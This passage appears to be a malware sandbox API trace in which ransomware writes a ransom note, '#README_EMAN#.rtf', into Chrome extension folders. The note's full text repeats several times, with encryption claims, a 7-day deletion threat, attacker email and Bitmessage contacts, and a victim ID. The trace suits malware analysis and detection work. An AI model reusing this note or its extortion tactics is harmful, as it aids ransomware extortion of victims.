ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.742] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.743] CloseHandle (hObject=0x228) returned 1 [0284.743] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0284.743] GetLastError () returned 0x2 [0284.743] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 